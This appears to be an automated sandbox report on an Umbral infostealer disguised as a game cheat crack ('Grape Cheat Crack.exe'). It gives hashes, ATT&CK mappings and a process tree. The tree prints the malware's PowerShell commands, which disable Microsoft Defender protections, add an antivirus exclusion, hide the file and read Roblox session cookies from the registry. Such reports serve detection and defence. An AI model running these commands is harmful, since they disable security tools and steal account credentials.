umbral | e70684c0929b0713733778032e5b310bae9967f544febfe62009c820f71e950d

General

Target

Grape Cheat Crack.exe
Size

494KB
MD5

7bafac8b38d3dd8452af266a2f4a4cce
SHA1

a71b7d1ae925605a05c4e9fd50a49e601626c84c
SHA256

e70684c0929b0713733778032e5b310bae9967f544febfe62009c820f71e950d
SHA512

08f2f1f334757858333b72488fffeb283809d202bf09b40fb5a6a32f4abb57b42484793e8c79a4e53c50cac576cbbea2fadc8f06edeeca84774c6cb90527904a
SSDEEP

12288:9oZOL+EP8sqcTR/k4XLG/BcoNPpUL8jNDxChcOtC+R:+I83cTR/k4XLG/BcoNPeLYND+

Score

10^/10

Malware Config

Signatures

Detect Umbral payload 1 IoCs

resource	yara_rule
behavioral1/memory/4360-0-0x00000237CE660000-0x00000237CE6E2000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Grape Cheat Crack.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	ip-api.com

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
4220	powershell.exe
4220	powershell.exe
4220	powershell.exe
4012	powershell.exe
4012	powershell.exe
4012	powershell.exe
2728	powershell.exe

Suspicious use of AdjustPrivilegeToken 25 IoCs

description	pid	Process
Token: SeDebugPrivilege	4360	Grape Cheat Crack.exe
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeIncreaseQuotaPrivilege	4220	powershell.exe
Token: SeSecurityPrivilege	4220	powershell.exe
Token: SeTakeOwnershipPrivilege	4220	powershell.exe
Token: SeLoadDriverPrivilege	4220	powershell.exe
Token: SeSystemProfilePrivilege	4220	powershell.exe
Token: SeSystemtimePrivilege	4220	powershell.exe
Token: SeProfSingleProcessPrivilege	4220	powershell.exe
Token: SeIncBasePriorityPrivilege	4220	powershell.exe
Token: SeCreatePagefilePrivilege	4220	powershell.exe
Token: SeBackupPrivilege	4220	powershell.exe
Token: SeRestorePrivilege	4220	powershell.exe
Token: SeShutdownPrivilege	4220	powershell.exe
Token: SeDebugPrivilege	4220	powershell.exe
Token: SeSystemEnvironmentPrivilege	4220	powershell.exe
Token: SeRemoteShutdownPrivilege	4220	powershell.exe
Token: SeUndockPrivilege	4220	powershell.exe
Token: SeManageVolumePrivilege	4220	powershell.exe
Token: 33	4220	powershell.exe
Token: 34	4220	powershell.exe
Token: 35	4220	powershell.exe
Token: 36	4220	powershell.exe
Token: SeDebugPrivilege	4012	powershell.exe
Token: SeDebugPrivilege	2728	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4360 wrote to memory of 868	4360	Grape Cheat Crack.exe	73
PID 4360 wrote to memory of 868	4360	Grape Cheat Crack.exe	73
PID 4360 wrote to memory of 4220	4360	Grape Cheat Crack.exe	75
PID 4360 wrote to memory of 4220	4360	Grape Cheat Crack.exe	75
PID 4360 wrote to memory of 4012	4360	Grape Cheat Crack.exe	78
PID 4360 wrote to memory of 4012	4360	Grape Cheat Crack.exe	78
PID 4360 wrote to memory of 2728	4360	Grape Cheat Crack.exe	80
PID 4360 wrote to memory of 2728	4360	Grape Cheat Crack.exe	80

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
868	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Grape Cheat Crack.exe
"C:\Users\Admin\AppData\Local\Temp\Grape Cheat Crack.exe"
1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4360
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Grape Cheat Crack.exe"
  2⤵
  - Views/modifies file attributes
  PID:868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Grape Cheat Crack.exe'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4220
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2728
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  PID:2424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

1

T1564

Hidden Files and Directories

1

T1564.001

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c8864050f076ad3230c821e43d7cfe9d

SHA1
dcb204688c1a11bfbc1a684b34e5a8538135b4ee

SHA256
b41f9c42daf3a8a9d9ecdc8acd71e5fa682357068e5159917eba30694321d1d8

SHA512
1c5a11a4d1f6e6a9fdf8a30051b52f8b8ef0673be400749a43a55b59c2d102f49e524e183427d7ffc735c0d254d9769d88fa03d06d2ff5d3b5aaf98ea463617c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6555e2a767b060e505609ba628980a77

SHA1
34259aad731812cb08835ffc0e0dc8bd04212a6c

SHA256
7dbff7a043a2e60e0eb3f8ddbf529b8ccb8c264c72cf40f82ef357a14ffdc478

SHA512
9ab8ec796db953ea6b3b00cf92c0d1c80c4bbfdea0801679fdc934c7d287941b425615ec1f65ec89eb6d7b4b63c0517074b865788c3768334c4f7499f79417bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4046f7718694134c47f19f00e9cc30fd

SHA1
e46fc0586b4c7e39fe86cd817c0cc680bed01471

SHA256
80ad6882dda251b5c8d0923264b0362c5e8ebde2126abf8c836d6f3449df746d

SHA512
1b20fd0b2b0ec425ca80d35934473fbf07d0445134783e803ddb1ff32670d62684349e71586ca73c28e5759010702fc88c76cd75a58ba2e8462ca719e67aa160

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ktmq2cg3.u1z.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
memory/2424-165-0x0000022639720000-0x0000022639730000-memory.dmp

Filesize
64KB

Download
memory/2424-138-0x0000022639720000-0x0000022639730000-memory.dmp

Filesize
64KB

Download
memory/2424-135-0x00007FF9B45A0000-0x00007FF9B4F8C000-memory.dmp

Filesize
9.9MB

Download
memory/2424-137-0x0000022639720000-0x0000022639730000-memory.dmp

Filesize
64KB

Download
memory/2424-164-0x0000022639720000-0x0000022639730000-memory.dmp

Filesize
64KB

Download
memory/2424-168-0x00007FF9B45A0000-0x00007FF9B4F8C000-memory.dmp

Filesize
9.9MB

Download
memory/2728-131-0x00007FF9B45A0000-0x00007FF9B4F8C000-memory.dmp

Filesize
9.9MB

Download
memory/2728-128-0x000001D468750000-0x000001D468760000-memory.dmp

Filesize
64KB

Download
memory/2728-127-0x000001D468750000-0x000001D468760000-memory.dmp

Filesize
64KB

Download
memory/2728-100-0x000001D468750000-0x000001D468760000-memory.dmp

Filesize
64KB

Download
memory/2728-99-0x000001D468750000-0x000001D468760000-memory.dmp

Filesize
64KB

Download
memory/2728-96-0x00007FF9B45A0000-0x00007FF9B4F8C000-memory.dmp

Filesize
9.9MB

Download
memory/4012-88-0x000001C5EE060000-0x000001C5EE070000-memory.dmp

Filesize
64KB

Download
memory/4012-89-0x00007FF9B45A0000-0x00007FF9B4F8C000-memory.dmp

Filesize
9.9MB

Download
memory/4012-57-0x00007FF9B45A0000-0x00007FF9B4F8C000-memory.dmp

Filesize
9.9MB

Download
memory/4012-60-0x000001C5EE060000-0x000001C5EE070000-memory.dmp

Filesize
64KB

Download
memory/4012-61-0x000001C5EE060000-0x000001C5EE070000-memory.dmp

Filesize
64KB

Download
memory/4220-49-0x0000026148B20000-0x0000026148B30000-memory.dmp

Filesize
64KB

Download
memory/4220-10-0x0000026148AF0000-0x0000026148B12000-memory.dmp

Filesize
136KB

Download
memory/4220-7-0x00007FF9B45A0000-0x00007FF9B4F8C000-memory.dmp

Filesize
9.9MB

Download
memory/4220-8-0x0000026148B20000-0x0000026148B30000-memory.dmp

Filesize
64KB

Download
memory/4220-9-0x0000026148B20000-0x0000026148B30000-memory.dmp

Filesize
64KB

Download
memory/4220-53-0x00007FF9B45A0000-0x00007FF9B4F8C000-memory.dmp

Filesize
9.9MB

Download
memory/4220-13-0x0000026148D20000-0x0000026148D96000-memory.dmp

Filesize
472KB

Download
memory/4220-26-0x0000026148B20000-0x0000026148B30000-memory.dmp

Filesize
64KB

Download
memory/4360-0-0x00000237CE660000-0x00000237CE6E2000-memory.dmp

Filesize
520KB

Download
memory/4360-93-0x00000237D0690000-0x00000237D06AE000-memory.dmp

Filesize
120KB

Download
memory/4360-126-0x00000237D03E0000-0x00000237D03F0000-memory.dmp

Filesize
64KB

Download
memory/4360-87-0x00007FF9B45A0000-0x00007FF9B4F8C000-memory.dmp

Filesize
9.9MB

Download
memory/4360-92-0x00000237E8E20000-0x00000237E8E70000-memory.dmp

Filesize
320KB

Download
memory/4360-2-0x00000237D03E0000-0x00000237D03F0000-memory.dmp

Filesize
64KB

Download
memory/4360-1-0x00007FF9B45A0000-0x00007FF9B4F8C000-memory.dmp

Filesize
9.9MB

Download
memory/4360-170-0x00000237D0650000-0x00000237D065A000-memory.dmp

Filesize
40KB

Download
memory/4360-171-0x00000237D06B0000-0x00000237D06C2000-memory.dmp

Filesize
72KB

Download

Resubmissions

Analysis

Sharing